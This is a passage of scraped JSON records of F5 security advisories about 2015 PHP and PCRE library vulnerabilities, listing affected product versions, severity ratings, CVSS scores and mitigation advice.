"CVE-2015-4025", "CVE-2015-4026"], "modified": "2016-05-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16993.html", "id": "SOL16993", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-06-08T00:16:24", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned ID 525232 (BIG-IP), ID 525232-6 (Enterprise Manager), and ID 528817-6 (BIG-IQ) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H530561 on the **Diagnostics **> **Identified **> **Medium **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP AAM| 11.4.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP AFM| 11.3.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP Analytics| 11.0.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP APM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP ASM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP Link Controller| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP PEM| 11.3.0 - 11.6.0| 12.0.0 \n11.6.1 \n11.5.4| Medium| PHP framework, Control Plane \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| PHP framework, Control Plane \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Medium| PHP framework, Control Plane \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP framework, Control Plane \nBIG-IQ ADC| 4.5.0| None| Low| PHP framework, Control Plane \nLineRate| None| 2.5.0 - 2.6.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The **Severity **values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability, F5 recommends that you expose management access only on trusted networks.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "reporter": "f5", "published": "2015-07-02T20:42:00", "title": "PHP vulnerability CVE-2015-4024", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4024"], "modified": "2016-05-27T18:20:00", "href": "https://support.f5.com/csp/article/K16826", "id": "F5:K16826", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:52", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2015-08-06T00:00:00", "title": "SOL17070 - PHP vulnerability CVE-2015-4021", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4021"], "modified": "2015-08-06T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/000/sol17070.html", "id": "SOL17070", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:06", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/12000/700/sol12766.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL12766: ARX hotfix matrix\n", "reporter": "f5", "published": "2015-07-17T00:00:00", "title": "SOL16984 - PCRE library vulnerability CVE-2015-2326", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Traffix SDC", "version": "4.4.0", "operator": "le"}, {"name": "ARX", "version": "6.4.0", "operator": "le"}, {"name": "Traffix SDC", "version": "3.5.1", "operator": "le"}], "cvelist": ["CVE-2015-2326"], "modified": "2015-07-17T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16984.html", "id": "SOL16984", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-06-10T03:47:06", "references": [], "description": "\nF5 Product Development has assigned ID 533698 (BIG-IP), ID 533924 (BIG-IQ and Enterprise Manager), CPF-15037 (Traffix SDC), and ID 476508 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP AAM| 12.0.0 \n11.6.0* \n11.4.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP AFM| 12.0.0 \n11.6.0* \n11.3.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP Analytics| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP APM| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP ASM| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP DNS| 12.0.0| 12.1.0| Low| PCRE package \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nBIG-IP GTM| 11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP Link Controller| 12.0.0 \n11.6.0* \n11.0.0 - 11.5.4* \n10.1.0 - 10.2.4*| 12.1.0| Low| PCRE package \nBIG-IP PEM| 12.0.0 \n11.6.0* \n11.3.0 - 11.5.4*| 12.1.0| Low| PCRE package \nBIG-IP PSM| 11.0.0 - 11.4.1* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nBIG-IP WOM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| PCRE package \nARX| 6.0.0 - 6.4.0| None| Low| Perl Library \nEnterprise Manager| 3.0.0 - 3.1.1*| None| Low| PCRE package \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0*| None| Low| PCRE package \nBIG-IQ Device| 4.2.0 - 4.5.0*| None| Low| PCRE package \nBIG-IQ Security| 4.0.0 - 4.5.0*| None| Low| PCRE package \nBIG-IQ ADC| 4.5.0*| None| Low| PCRE package \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| Reporting application \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\n* Although the BIG-IP/BIG-IQ/Enterprise Manager software contains the vulnerable code, BIG-IP/BIG-IQ/Enterprise Manager does not use the vulnerable code in a way that exposes the vulnerability. An attacker must have local access to BIG-IP/BIG-IQ/Enterprise Manager to trigger an exploit, which the attacker can then run arbitrary code. Therefore, F5 Product Development considers this vulnerability as Not Vulnerable in a standard configuration and Low Severity if management access to BIG-IP/BIG-IQ/Enterprise Manager is not adequately protected, for example over a secure network.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "edition": 1, "reporter": "f5", "published": "2015-07-22T23:31:00", "title": "PCRE library vulnerability CVE-2015-2325", "type": "f5", "enchantments": {"score": {"modified": "2018-06-10T03:47:06", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-2325"], "modified": "2018-06-10T01:59:00", "id": "F5:K16983", "href": "https://support.f5.com/csp/article/K16983", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-26T17:22:59", "references": ["https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/12000/700/sol12766.html", "https://support.f5.com/kb/en-us/solutions/public/10000/900/sol10942.html", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "* Although the BIG-IP/BIG-IQ/Enterprise Manager software contains the vulnerable code, BIG-IP/BIG-IQ/Enterprise Manager does not use the vulnerable code in a way that exposes the vulnerability. An attacker must have local access to BIG-IP/BIG-IQ/Enterprise Manager to trigger an exploit, which the attacker can then run arbitrary code. Therefore, F5 Product Development considers this vulnerability as Not Vulnerable in a standard configuration and Low Severity if management access to BIG-IP/BIG-IQ/Enterprise Manager is not adequately protected, for example over a secure network.\n\nVulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "reporter": "f5", "published": "2015-07-22T00:00:00", "title": "SOL16983 - PCRE library vulnerability CVE-2015-2325", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP APM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP AAM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP AFM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.5.4", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.4", "operator": "le"}, {"name": "Traffix SDC", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP DNS", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IQ ADC", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "ARX", "version": "6.4.0", "operator": "le"}, {"name": "Traffix SDC", "version": "3.5.1", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP ASM", "version": "12.0.0", "operator": "le"}], "cvelist": ["CVE-2015-2325"], "modified": "2016-06-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16983.html", "id": "SOL16983", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-27T21:23:13", "references": ["https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The **Severity **values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, F5 recommends that you expose management access only on trusted networks.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n", "reporter": "f5", "published": "2015-07-02T00:00:00", "title": "SOL16826 - PHP vulnerability CVE-2015-4024", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.5.0", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IQ ADC", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.6.0", "operator": "le"}], "cvelist": ["CVE-2015-4024"], "modified": "2016-05-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16826.html", "id": "SOL16826", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-03-19T09:01:54", "references": ["https://support.f5.com/kb/en-us/solutions/public/10000/300/sol10322.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/6000/600/sol6664.html", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123", "https://support.f5.com/kb/en-us/solutions/public/12000/700/sol12766.html", "https://support.f5.com/kb/en-us/solutions/public/10000/900/sol10942.html", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/3000/400/sol3430.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "reporter": "f5", "published": "2015-06-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SOL16764 - PHP vulnerability CVE-2015-4022", "type": "f5", "bulletinFamily": "software", "cvelist": ["CVE-2015-4022"], "modified": "2015-06-17T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/700/sol16764.html", "id": "SOL16764", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-06-08T00:16:21", "references": [], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "reporter": "f5", "published": "2016-07-06T01:25:00", "title": "PHP vulnerabilities CVE-2015-4642, CVE-2015-4643, and CVE-2015-4644", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 